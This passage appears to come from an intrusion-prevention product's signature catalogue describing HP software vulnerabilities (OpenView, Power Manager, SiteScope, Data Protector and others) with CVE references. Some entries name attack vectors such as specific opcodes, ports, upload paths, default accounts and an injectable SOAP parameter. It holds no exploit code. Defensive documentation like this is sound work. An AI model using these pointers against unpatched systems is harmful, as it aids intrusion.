https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1961

BID-40638
http://www.securityfocus.com/bid/40638

OSVDB-65428
http://www.osvdb.org/65428

HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager.

Situation:

HTTP_CRL-HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow

References:

CVE-2011-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0262

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow

About this vulnerability:

A stack buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application snmpviewer.exe

Risk:

High

First detected in:

sgpkg-ips-307-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application snmpviewer.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.

Situation:

HTTP_CRL-HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow

References:

CVE-2010-1552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552

BID-40068
http://www.securityfocus.com/bid/40068

HP-OpenView-Omniback-II-System-Compromise

About this vulnerability:

HP OpenView Omniback II has an unspecified remote command execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView OmniBack II

Type:

Malfunction

Description:

OpenView Omniback II is reported prone to an unspecified remote command execution vulnerability. This issue can allow a remote attacker to gain superuser privileges on a vulnerable computer.

Situation:

Generic_HP-OpenView-Omniback-II-System-Compromise

References:

CVE-2001-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0311

BID-11032
http://www.securityfocus.com/bid/11032

HP-OpenView-Operations-A.07.50-Buffer-Overflow

About this vulnerability:

HP OpenView Operations A.07.50 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView

Type:

Buffer Overflow

Description:

A multiple stack based buffer overflow vulnerability in the Shared Trace Service in HP OpenView Operations A.07.50 which allows attackers to remotly execute arbitrary code via specially crafted requests.

Situation:

Generic_CS-HP-OpenView-Operations-A.07.50-Buffer-Overflow

References:

CVE-2007-3872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3872

BID-25255
http://www.securityfocus.com/bid/25255

OSVDB-39527
http://www.osvdb.org/39527

HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution

About this vulnerability:

A vulnerability in HP OpenView Performance Insight (OVPI)

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Performance Insight

Type:

Malfunction

Description:

A code execution vulnerability exists in HP OpenView Performance Insight server.

Situation:

HTTP_CSH-HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution

References:

CVE-2011-0276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276

BID-46079
http://www.securityfocus.com/bid/46079

OSVDB-70754
http://www.osvdb.org/70754

HP-OpenView-Storage-Data-Protector-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Storage Data Protector 5.5 and 6.0

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView Application Recovery Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in HP OpenView Storage Data Protector 5.5 and 6.0 which allows attackers to remotly execute arbitrary code via an long MSG_PROTOCOL command with long arguments.

Situation:

Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow

References:

CVE-2007-2280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2280

BID-37396
http://www.securityfocus.com/bid/37396

OSVDB-61206
http://www.osvdb.org/61206

HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in HP OpenView Data Protector Cell Manager

Risk:

High

First detected in:

sgpkg-ips-280-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Data Protector Application Recovery Manager

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in HP OpenView Data Protector Cell Manager. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the affected service to execute arbitrary code with the privileges of the service, which is usually SYSTEM.

Situation:

Generic_CS-HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow

References:

CVE-2007-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2281

BID-37386
http://www.securityfocus.com/bid/37386

OSVDB-61205
http://www.osvdb.org/61205

HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in HP OpenView Storage Data Protector detected

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView Storage Data Protector

Type:

Malfunction

Description:

A buffer overflow vulnerability exists in HP OpenView Storage Data Protector. The vulnerability is due to improper bounds checking while parsing EXEC_CMD requests sent to the vulnerable service. A remote attacker could exploit this by sending a malicious packets to the target.

Situation:

Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow-2

References:

CVE-2011-1866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866

BID-48488
http://www.securityfocus.com/bid/48488

OSVDB-73572
http://www.osvdb.org/73572

HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow

About this vulnerability:	Buffer overflow vulnerability in HP OpenView Data Protector
Risk:	High
First detected in:	sgpkg-ips-280-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	HP OpenView Data Protector Application Recovery Manager
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in HP OpenView Data Protector. A remote unauthenticated attacker can exploit this vulnerability by sending a 0x010b request to a target server to execute arbitrary code with the privileges of the service.
Situation:	Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow

HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2

About this vulnerability:

An attempt to exploit vulnerability in HP OpenView Storage Data Protector detected

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView Storage Data Protector

Type:

Malfunction

Description:

A stack buffer overflow vulnerability exists in HP OpenView Storage Data Protector. The vulnerability is due to improper parsing of opcode 27 requests sent to the vulnerable service.

Situation:

Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-3
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-4

References:

CVE-2011-1865
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865

BID-48486
http://www.securityfocus.com/bid/48486

OSVDB-73571
http://www.osvdb.org/73571

HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Operations Agent for NonStop Server

Risk:

High

First detected in:

sgpkg-ips-490-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Operations Agent

Type:

Input Validation

Description:

A buffer overflow vulnerability has been discovered in HP Operations Agent for NonStop Server. The vulnerability is due to an insufficient boundary check prior to copying user-supplied data into a stack buffer when handling the HEALTH packet type. An attacker can exploit this vulnerability by sending a malicious request message to the vulnerable service on port 7771/TCP or 8976/TCP. Successful exploitation of the vulnerability would lead to code execution in the security context of the affected service, which is SYSTEM. If the attack fails, the application may terminate abnormally.

Situation:

Generic_CS-HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow

References:

OSVDB-84854
http://www.osvdb.org/84854

HP-Operations-Agent-Performance-Component-Last-Chunk-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Operations Agent

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

HP Operations Agent

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in HP Operations Agent. When handling a length-encoded chunk in a request received over the network, the vulnerable code copies user-supplied data into a fixed-length stack buffer without boundary check. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with System privileges on Windows platforms.

Situation:

HTTP_CS-HP-Operations-Agent-Opcode-0x34-Stack-Buffer-Overflow

References:

CVE-2012-2019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2019

OSVDB-83673
http://www.osvdb.org/83673

HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Performance Agent

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Operations Agent

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in HP Operations Agent. When handling requests with various opcodes, the vulnerable code uses a user-supplied value as the length for a copy operation whose destination is a fixed length stack buffer. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system.

Situation:

Generic_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
HTTP_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow

References:

CVE-2012-2020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2020

OSVDB-83674
http://www.osvdb.org/83674

HP-Operations-Manager-Server-Unauthorized-File-Upload

About this vulnerability:

A vulnerability in HP Operations Manager for Windows

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

HP Operations Manager for Windows

Type:

Malfunction

Description:

An unauthorized file upload vulnerability exists in HP Operations Manager. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to /manager/html/upload using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. In this case, the injected code will run with the privileges of SYSTEM.

Situation:

HTTP_CSH-HP-Operations-Manager-Server-Unauthorized-File-Upload

References:

CVE-2009-3843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843

BID-37086
http://www.securityfocus.com/bid/37086

OSVDB-60317
http://www.osvdb.org/60317

HP-Photo-Creative-Audio-Record-ActiveX-BOF

About this vulnerability:	A vulnerability in HP Photo Creative
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	HP Photo Creative
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in HP Photo Creative ActiveX control. The vulnerability is due to a boundary error in ContentMan.dll while parsing arguments passed to the Resample function of the audio.Record ActiveX control. Remote attackers could exploit this vulnerability by enticing the target users to visit a specially crafted web page. Successful exploitation would result in arbitrary code execution with the privileges of the logged in user.
Situation:	File-Text_HP-Photo-Creative-Audio-ActiveX-BOF

HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Open-Method-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OLE Point of Sale (OPOS) Driver

Risk:

Moderate

First detected in:

sgpkg-ips-636-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OPOS Driver

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the OPOSPOSKeyboard.ocx component of HP Point of Sale PC running with OPOS Driver. The vulnerability is due to insufficient input validation on user controlled data to the Open method. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a malicious file or visit a malicious page. Successful exploitation could lead to code execution under the security context of the browser process.

Situation:

File-Text_HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Buffer-Overflow2

References:

CVE-2014-7891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7891

OSVDB-119192
http://www.osvdb.org/119192

HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OLE Point of Sale (OPOS) Driver

Risk:

Moderate

First detected in:

sgpkg-ips-636-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OPOS Driver

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the opostoneindicator.ocx component of HP Point of Sale PC running with OPOS Driver. The vulnerability is due to insufficient input validation on user supplied parameter value to the Open method. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a malicious file or visit a malicious page. Successful exploitation could lead to code execution under the security context of the currently logged on user.

Situation:

File-Text_HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow

References:

CVE-2014-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7890

OSVDB-119191
http://www.osvdb.org/119191

HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Power Manager

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Power Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Power Manager. This vulnerability may be exploited by remote unauthenticated attackers to cause execution of arbitrary code on the target system in the context of the affected service.

Situation:

HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow

References:

CVE-2010-4113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4113

HP-Power-Manager-Form-Export-Logs-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP Power Manager

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Power Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP Power Manager. The vulnerability is due to insufficient bounds checking while processing URL parameters in the formExportDataLogs form of the web based management web server. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the target system in the context of the SYSTEM user by sending malicious HTTP requests.

Situation:

HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Buffer-Overflow

References:

CVE-2009-3999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3999

BID-37866
http://www.securityfocus.com/bid/37866

HP-Power-Manager-Form-Export-Logs-Directory-Traversal

About this vulnerability:

A directory traversal vulnerability in HP Power Manager

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Power Manager

Type:

Input Validation

Description:

There is a directory traversal vulnerability in HP Power Manager. A remote unauthenticated attacker can exploit this vulnerability to overwrite arbitrary files with attacker-controlled data on the target system by sending malicious HTTP requests, possibly leading to execution of arbitrary code within the SYSTEM security context.

Situation:

HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Directory-Traversal

References:

CVE-2009-4000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4000

BID-37873
http://www.securityfocus.com/bid/37873

OSVDB-61849
http://www.osvdb.org/61849

HP-Power-Manager-Login-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP Power Manager

Risk:

High

First detected in:

sgpkg-ips-264-3038

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

HP Power Manager

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in HP Power Manager. The vulnerability is due to insufficient bounds checking in the HP Power Manager when processing URL parameters in the login form of the web-based management web server. Remote unauthenticated attackers can exploit this vulnerability by sending malicious HTTP requests to the target. Successful exploitation can result in the execution of arbitrary code in the security context of the service, normally SYSTEM.

Situation:

HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow

References:

CVE-2009-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2685

BID-36933
http://www.securityfocus.com/bid/36933

OSVDB-59684
http://www.osvdb.org/59684

HP-Procurve-Manager-Snac-File-Upload

About this vulnerability:

An HP Procurve Manager Snac File Upload vulnerability

Risk:

High

First detected in:

sgpkg-ips-780-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP ProCurve Manager

Type:

Misconfiguration

Description:

A vulnerability in HP ProCurve Manager, vesion 4.0, in UpdateCertificatesServlet, which allows remote attackers to upload .jsp files, and possibly excute remote code.

Situation:

HTTP_CS-HP-Procurve-Manager-Snac-File-Upload

References:

CVE-2013-4812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812

BID-62348
http://www.securityfocus.com/bid/62348

OSVDB-97155
http://www.osvdb.org/97155

HP-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass

About this vulnerability:	A vulnerability in HP Identity Driven Manager
Risk:	Moderate
First detected in:	sgpkg-ips-544-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Identity Driven Manager; HP ProCurve Manager; HP ProCurve Manager Plus
Type:	Malfunction
Description:	There is a policy bypass vulnerability in HP ProCurve Manager SNAC. The vulnerability is due to a design weakness in the GetDomainControllerServlet class. A remote attacker could exploit the vulnerability by sending specially crafted data to a vulnerable version of the software. Successful exploitation could result in authentication bypass.
Situation:	HTTP_CSU-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass

HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution

About this vulnerability:

A vulnerability in HP Identity Driven Manager

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Identity Driven Manager; HP ProCurve Manager; HP ProCurve Manager Plus

Type:

Directory Traversal

Description:

A vulnerability has been reported in HP ProCurve Manager SNAC. The vulnerability is due to directory traversal in the UpdateDomainControllerServlet class. A remote attacker could exploit the vulnerability by sending specially crafted data to a vulnerable version of the software. Successful exploitation could result in code execution under the context of SYSTEM.

Situation:

HTTP_CS-HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution

References:

CVE-2013-4811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4811

BID-62349
http://www.securityfocus.com/bid/62349

OSVDB-97154
http://www.osvdb.org/97154

HP-Release-Control-Authenticated-Privilege-Escalation

About this vulnerability:

A vulnerability in HP Release Control

Risk:

Moderate

First detected in:

sgpkg-ips-590-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Release Control

Type:

Malfunction

Description:

A privilege escalation vulnerability exists in HP Release Control. The vulnerability is due to a design weakness in implementing access control restrictions to the "updateUserPassword" method. A remote, authenticated but unprivileged user is able to exploit this vulnerability by sending unauthorized requests to the server. Successful exploitation will allow the attacker to set the administrator password to a string of their choosing.

Situation:

HTTP_CS-HP-Release-Control-Authenticated-Privilege-Escalation

References:

BID-67461
http://www.securityfocus.com/bid/67461

OSVDB-107050
http://www.osvdb.org/107050

HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal

About this vulnerability:

A vulnerability in HP Service Virtualization

Risk:

Moderate

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Service Virtualization

Type:

Directory Traversal

Description:

A code execution vulnerability exists in HP Service Virtualization running the AutoPass License Server. The vulnerability is due to a directory traversal flaw in UploadRequestHandler.class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. In the event of a successful attack, arbitrary files can be created on the server, leading to arbitrary code execution in the context of the SYSTEM.

Situation:

HTTP_CS-HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal

References:

CVE-2013-6221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6221

OSVDB-107943
http://www.osvdb.org/107943

HP-Sitescope-Emailservlet-Information-Disclosure

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Input Validation

Description:

An information disclosure vulnerability exists in HP SiteScope. The vulnerability is due to a lack of input validation in the EmailServlet servlet when processing HTTP requests. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. In a successful attack scenario, the attacker can disclose the contents of arbitrary files on the local file system.

Situation:

HTTP_CRL-HP-Sitescope-Emailservlet-Information-Disclosure

References:

CVE-2014-2614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2614

BID-68632
http://www.securityfocus.com/bid/68632

OSVDB-108709
http://www.osvdb.org/108709

HP-Sitescope-Integrationviewer-Default-Credentials

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Malfunction

Description:

A default credential vulnerability has been reported in HP SiteScope. On a fresh installation of SiteScope, the administrator account is accessible without a password and there is a user account called integrationViewer with a default password. A remote attacker can exploit these default credentials to access the SiteScope web interface. Once authenticated, the attacker can exploit additional policy-bypass and directory-traversal vulnerabilities. Through specially crafted requests, they allow the attacker to perform administrative tasks when authenticated as a non-administrative user and to read contents of arbitrary files.

Situation:

HTTP_CRL-HP-Sitescope-Integrationviewer-Default-Credentials

References:

BID-49345
http://www.securityfocus.com/bid/49345

OSVDB-74865
http://www.osvdb.org/74865

HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

High

First detected in:

sgpkg-ips-549-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Malfunction

Description:

A command execution vulnerability has been found in HP SiteScope. The vulnerability is due to lack of authentication when handling "issueSiebelCmd" SOAP requests. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation of these vulnerabilities can lead to arbitrary command execution.

Situation:

HTTP_CS-HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution

References:

CVE-2013-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4835

OSVDB-99230
http://www.osvdb.org/99230

HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

Moderate

First detected in:

sgpkg-ips-478-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Malfunction

Description:

There is an information disclosure vulnerability in HP SiteScope. The vulnerability is due to an access control weakness resulting in the disclosure of file contents on the target system via several SOAP requests. An unauthenticated remote attacker can exploit this vulnerability by sending malicious SOAP requests to the target server to view the contents of an arbitrary file. A successful exploitation attempt could result in the disclosure of information of any file on the target system, which can be used by a future attack.

Situation:

HTTP_CS-HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure

References:

OSVDB-85118
http://www.osvdb.org/85118

HP-Sitescope-Log-Analyzer-Information-Disclosure

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

High

First detected in:

sgpkg-ips-650-5211

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Input Validation

Description:

A privilege escalation vulnerability exists in HP SiteScope. The vulnerability is due to improper validation of the log path, allowing the user to read the users.config file. A remote, authenticated attacker may exploit this vulnerability by submitting a crafted log path. Successful exploitation would allow the authenticated attacker to gain administrator role privileges.

Situation:

HTTP_CS-HP-Sitescope-Log-Analyzer-Information-Disclosure

References:

CVE-2015-2120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2120

HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

Moderate

First detected in:

sgpkg-ips-481-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Directory Traversal

Description:

Two directory traversal vulnerabilities have been reported in HP SiteScope. The Vulnerabilities are due to insufficient validation of user input while processing URL parameters provided to UploadDownload manager servlets. A remote authenticated attacker can exploit these vulnerabilities by sending malicious requests to a target URL to upload and download arbitrary files. A successful exploitation attempt could lead to remote code execution under in the context of the process that executes the uploaded file, which is can be SYSTEM, depending on the uploaded file. HP has released an advisory: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03489683&ac.admitted=1348238310857.876444892.199480143

Situation:

HTTP_CRL-HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities

References:

BID-55273
http://www.securityfocus.com/bid/55273

OSVDB-85121
http://www.osvdb.org/85121

HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

Moderate

First detected in:

sgpkg-ips-480-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Malfunction

Description:

Two security bypass weaknesses have been reported in HP SiteScope. The vulnerabilities are due to insufficient access controls when processing SOAP requests to APIPreferenceImpl. A remote, unauthenticated attacker can exploit these vulnerabilities to create new user accounts on the server, view the SiteScope Administrator account properties such as login information and modify them if desired.

Situation:

HTTP_CS-HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass

References:

BID-55269
http://www.securityfocus.com/bid/55269

HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

Moderate

First detected in:

sgpkg-ips-479-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Malfunction

Description:

Two access control weaknesses have been reported in HP SiteScope. The vulnerabilities are due to insufficient controls when sending SOAP requests to APISiteScopeImpl. A remote, unauthenticated attacker can exploit these vulnerabilities to obtain the administrator's username and password and the content of arbitrary files on the target server. HP has not released an advisory regarding this vulnerability.

Situation:

HTTP_CS-HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures

References:

BID-55269
http://www.securityfocus.com/bid/55269

OSVDB-85119
http://www.osvdb.org/85119

HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection

About this vulnerability:

A vulnerability in HP SiteScope

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP SiteScope

Type:

Input Validation

Description:

A command injection vulnerability exists in HP SiteScope SOAP component. The vulnerability is due to insufficient validation of "omHost" key value. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary command with the SYSTEM context on the vulnerable target.

Situation:

HTTP_CS-HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection

References:

CVE-2013-2367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2367

OSVDB-95824
http://www.osvdb.org/95824

HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption

About this vulnerability:

A vulnerability in HP Sprinter

Risk:

Moderate

First detected in:

sgpkg-ips-615-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Sprinter

Type:

Malfunction

Description:

Multiple vulnerabilities exist in HP Sprinter. The vulnerabilities are in methods AttachToSS, CopyRange, CopyRangeEx, and SwapTables within the Tidestone Formula One ActiveX control. A remote, unauthenticated attacker could exploit this vulnerability by enticing an unsuspecting victim to follow a malicious link. A successful attack could result in the execution of arbitrary script code in the user's browser in the context of the affected site.

Situation:

File-Text_HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption

References:

CVE-2014-2635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2635

HP-Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Sprinter

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Sprinter

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in HP Sprinter. The vulnerability is due to a buffer overflow while handling the DefaultFontName property within the Tidestone Formula One ActiveX control. A remote attacker could exploit this vulnerability by enticing an unsuspecting victim to follow a malicious link. A successful attack could result in the execution of arbitrary code in the context of the affected user.

Situation:

File-Text_Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow

References:

CVE-2014-2638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2638

HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF

About this vulnerability:

A vulnerability in HP StorageWorks File Migration Agent

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP StorageWorks File Migration Agent

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in HP StorageWorks. This vulnerability is due to insufficient validation of the size of the "archive name" variable while processing CIFS archive requests within RsaCIFS.dll. A remote, unauthenticated attacker can exploit the vulnerability by sending overly long requests to File Migration Agent which listens on port TCP/9111. Exploitation may crash the application resulting in a denial of service and may also lead to arbitrary code execution.

Situation:

Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF

References:

OSVDB-84102
